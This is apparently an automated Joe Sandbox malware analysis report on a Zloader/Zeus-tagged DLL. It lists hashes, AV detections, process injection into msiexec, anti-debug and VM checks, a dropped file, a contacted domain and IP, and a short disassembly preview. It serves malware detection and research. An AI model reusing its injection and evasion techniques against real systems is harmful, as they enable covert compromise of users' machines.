Analysis Report ERRoqGpsIS

Overview

General Information

Sample Name: ERRoqGpsIS (renamed file extension from none to dll)
Analysis ID: 352815
MD5: d2852a3b2a20846528cec53426fd5f9c
SHA1: 1fa892f9280708e7c82e958bec516bb2b09351f3
SHA256: 8e50da51386c2f267afaf1a419e4467d62c01c9704f0e17c4aa188d0c090c8b2
Tags: zloader2

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to inject code into remote processes
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Queries the product ID of Windows
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5348 cmdline: loaddll32.exe 'C:\Users\user\Desktop\ERRoqGpsIS.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • msiexec.exe (PID: 6344 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll, Virustotal: Detection: 57%
Source: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll, Metadefender: Detection: 24%
Source: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll, ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: ERRoqGpsIS.dll, Virustotal: Detection: 57%
Source: ERRoqGpsIS.dll, Metadefender: Detection: 24%
Source: ERRoqGpsIS.dll, ReversingLabs: Detection: 50%

Compliance:

Uses 32bit PE files
Source: ERRoqGpsIS.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses secure TLS version for HTTPS connections
Source: unknown, HTTPS traffic detected: 104.21.45.75:443 -> 192.168.2.3:49728 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: c:\FindHeard\EndLook\ChartBegan\WinSentence\Rain.pdb source: loaddll32.exe, 00000000.00000002.302107930.000000006E4F5000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dll
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_008215D0 FindFirstFileW,FindNextFileW,14_2_008215D0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov byte ptr [ebp+edi-50h], al0_2_6E4D0230
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov al, byte ptr [edx+ebx]0_2_6E4CEAB0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov edi, 00000002h0_2_6E4B2730
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov edi, dword ptr [ebp+ebx*4-00000114h]0_2_6E4C9BF0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then xor ebx, ebx0_2_6E4BEB90
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then inc edi0_2_6E4C1F90
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov byte ptr [ebp+ebx-00000084h], al0_2_6E4CF870
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov esi, dword ptr [6E4D66F0h+edi*4]0_2_6E4C88F0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movsx ebx, byte ptr [esi]0_2_6E4C1D60
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then push dword ptr [ebp-14h]0_2_6E4B7170
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then add esi, 02h0_2_6E4CE970
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esi, dword ptr [008266F0h+edi*4]14_2_008188F0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [ebp+ebx-00000084h], al14_2_0081F870
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movsx ebx, byte ptr [esi]14_2_00811D60
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push dword ptr [ebp-14h]14_2_00807170
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h14_2_0081E970
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov al, byte ptr [edx+ebx]14_2_0081EAB0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [ebp+edi-50h], al14_2_00820230
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then xor ebx, ebx14_2_0080EB90
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then inc edi14_2_00811F90
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edi, dword ptr [ebp+ebx*4-00000114h]14_2_00819BF0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edi, 00000002h14_2_00802730
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: earfetti.com
Source: loaddll32.exe, 00000000.00000002.302144785.000000006E51C000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dllString found in binary or memory: http://www.enoughthose.de8
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownHTTPS traffic detected: 104.21.45.75:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4E97D8 appears 34 times
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: ERRoqGpsIS.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: ERRoqGpsIS.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: inaxa.dll.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal60.evad.winDLL@3/1@1/1
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0080E070 AdjustTokenPrivileges,14_2_0080E070
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\IlgyrJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{AE3C19F7-A2D0-F8C5-70B9-D0EFD3468FD7}
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{8E4429F7-92D0-D8BD-70B9-D0EFD3468FD7}
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{3EAD2B6B-904C-6854-70B9-D0EFD3468FD7}
Source: ERRoqGpsIS.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: ERRoqGpsIS.dllVirustotal: Detection: 57%
Source: ERRoqGpsIS.dllMetadefender: Detection: 24%
Source: ERRoqGpsIS.dllReversingLabs: Detection: 50%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\ERRoqGpsIS.dll'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\FindHeard\EndLook\ChartBegan\WinSentence\Rain.pdb source: loaddll32.exe, 00000000.00000002.302107930.000000006E4F5000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dll
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CF870 LoadLibraryA,GetProcAddress,0_2_6E4CF870
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0380 push eax; ret 0_2_6E4C038A
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DF6C6 push FFFFFFFFh; ret 0_2_6E4DF6D4
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DDC4B push esp; ret 0_2_6E4DDC7B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D9C73 push es; iretd 0_2_6E4D9D28
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D9CB3 push es; iretd 0_2_6E4D9D28
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E981D push ecx; ret 0_2_6E4E9830
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D98AA push esp; ret 0_2_6E4D98B9
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E509381 push eax; ret 0_2_6E5093B1
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E509400 push eax; ret 0_2_6E5093B1
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00823CEA push D85411E4h; iretd 14_2_00823CF6
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00810380 push eax; ret 14_2_0081038A
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EDA28 sldt word ptr [eax]0_2_6E4EDA28
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_008215D0 FindFirstFileW,FindNextFileW,14_2_008215D0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E8B05 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4E8B05
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CF870 LoadLibraryA,GetProcAddress,0_2_6E4CF870
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C3E90 mov eax, dword ptr fs:[00000030h]0_2_6E4C3E90
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E50A2F7 mov eax, dword ptr fs:[00000030h]0_2_6E50A2F7
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E509E34 push dword ptr fs:[00000030h]0_2_6E509E34
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E50A22D mov eax, dword ptr fs:[00000030h]0_2_6E50A22D
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00813E90 mov eax, dword ptr fs:[00000030h]14_2_00813E90
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EFE11 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_6E4EFE11
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EAE48 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4EAE48
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E8B05 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4E8B05
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9009 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4E9009

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CDD00 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,0_2_6E4CDD00
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,0_2_6E4F1A50
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EF1C8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_6E4EF1C8
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Native API 1 | DLL Side-Loading 1 | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Security Software Discovery 12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading 1 | Access Token Manipulation 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | System Information Discovery 23 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| ERRoqGpsIS.dll | 58% | Virustotal | |
| ERRoqGpsIS.dll | 24% | Metadefender | |
| ERRoqGpsIS.dll | 50% | ReversingLabs | Win32.Trojan.Zeus |

Dropped Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll | 58% | Virustotal | |
| C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll | 24% | Metadefender | |
| C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll | 50% | ReversingLabs | Win32.Trojan.Zeus |

Unpacked PE Files

No Antivirus matches

Domains

| Source | Detection | Scanner | Label |
|---|---|---|---|
| earfetti.com | 1% | Virustotal | |

URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://www.enoughthose.de8 | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| earfetti.com | 104.21.45.75 | true | false | | unknown |

URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://www.enoughthose.de8 | loaddll32.exe, 00000000.00000002.302144785.000000006E51C000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dll | false | Avira URL Cloud: safe | unknown |

Contacted IPs

Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 104.21.45.75 | unknown | United States | 13335 | CLOUDFLARENETUS | false |

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 352815
Start date: 14.02.2021
Start time: 15:13:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ERRoqGpsIS (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal60.evad.winDLL@3/1@1/1
EGA Information: Failed
HDC Information:
  • Successful, ratio: 60.6% (good quality ratio 59.7%)
  • Quality average: 87.8%
  • Quality standard deviation: 22.1%
HCA Information:
  • Successful, ratio: 63%
  • Number of executed functions: 43
  • Number of non-executed functions: 42
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.43.139.144, 184.30.20.56, 20.190.160.136, 20.190.160.4, 20.190.160.75, 20.190.160.134, 20.190.160.8, 20.190.160.67, 20.190.160.71, 20.190.160.2, 51.104.139.180, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.11.168.160, 52.155.217.156
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, ams2.current.a.prd.aadg.trafficmanager.net
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN


JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll
Process: C:\Windows\SysWOW64\msiexec.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 371200
Entropy (8bit): 6.696631640331289
Encrypted: false
SSDEEP: 6144:X5fVAHOvzY7zHY0Uxen/0TP1a2arz7JjOGG3v2WYXmpHdwpc2:X5wgmY0ZMTZIOGyv2WYWNdI
MD5: D2852A3B2A20846528CEC53426FD5F9C
SHA1: 1FA892F9280708E7C82E958BEC516BB2B09351F3
SHA-256: 8E50DA51386C2F267AFAF1A419E4467D62C01C9704F0E17C4AA188D0C090C8B2
SHA-512: 247FAE9F2C9BDCA9D7EB4F44996E7E28D2CD9B7C87EA05A15B72ECB073750C8D9199D585771366687C43D802EB474E9486BB328D2984ABEB4AACEE62916CA2B6
Malicious: true
Antivirus:
  • Antivirus: Virustotal, Detection: 58%
  • Antivirus: Metadefender, Detection: 24%
  • Antivirus: ReversingLabs, Detection: 50%
Reputation: low

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.696631640331289
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ERRoqGpsIS.dll
File size: 371200
MD5: d2852a3b2a20846528cec53426fd5f9c
SHA1: 1fa892f9280708e7c82e958bec516bb2b09351f3
SHA256: 8e50da51386c2f267afaf1a419e4467d62c01c9704f0e17c4aa188d0c090c8b2
SHA512: 247fae9f2c9bdca9d7eb4f44996e7e28d2cd9b7c87ea05a15b72ecb073750c8d9199d585771366687c43d802eb474e9486bb328d2984abeb4aacee62916ca2b6
SSDEEP: 6144:X5fVAHOvzY7zHY0Uxen/0TP1a2arz7JjOGG3v2WYXmpHdwpc2:X5wgmY0ZMTZIOGyv2WYWNdI

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x10038f4c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x4B688CFC [Tue Feb 2 20:37:16 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: ac24111956da8096856f399aab20c9c0

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FCD40E11727h
call 00007FCD40E17991h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FCD40E11611h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [10058628h+ecx*8]
je 00007FCD40E11735h
inc ecx
cmp ecx, 2Dh
jc 00007FCD40E11713h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FCD40E11730h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [1005862Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FCD40E13B21h
test eax, eax
jne 00007FCD40E11728h
mov eax, 10058790h
ret
add eax, 08h
ret
call 00007FCD40E13B0Eh
test eax, eax
jne 00007FCD40E11728h
mov eax, 10058794h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007FCD40E11707h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FCD40E116A7h
pop ecx
mov esi, eax
call 00007FCD40E116E1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [1006A5ECh], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h

Rich Headers

Programming Language:
  • [ C ] VS2008 build 21022
  • [ASM] VS2008 build 21022
  • [LNK] VS2008 build 21022
  • [RES] VS2008 build 21022
  • [EXP] VS2008 build 21022
  • [IMP] VS2008 SP1 build 30729
  • [C++] VS2008 build 21022

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x57480 | 0x45 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x56b9c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6c000 | 0x518 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6d000 | 0x16f8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x451c0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x557c8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x45000 | 0x18c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x43abe | 0x43c00 | False | 0.716375259456 | data | 6.67890498403 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
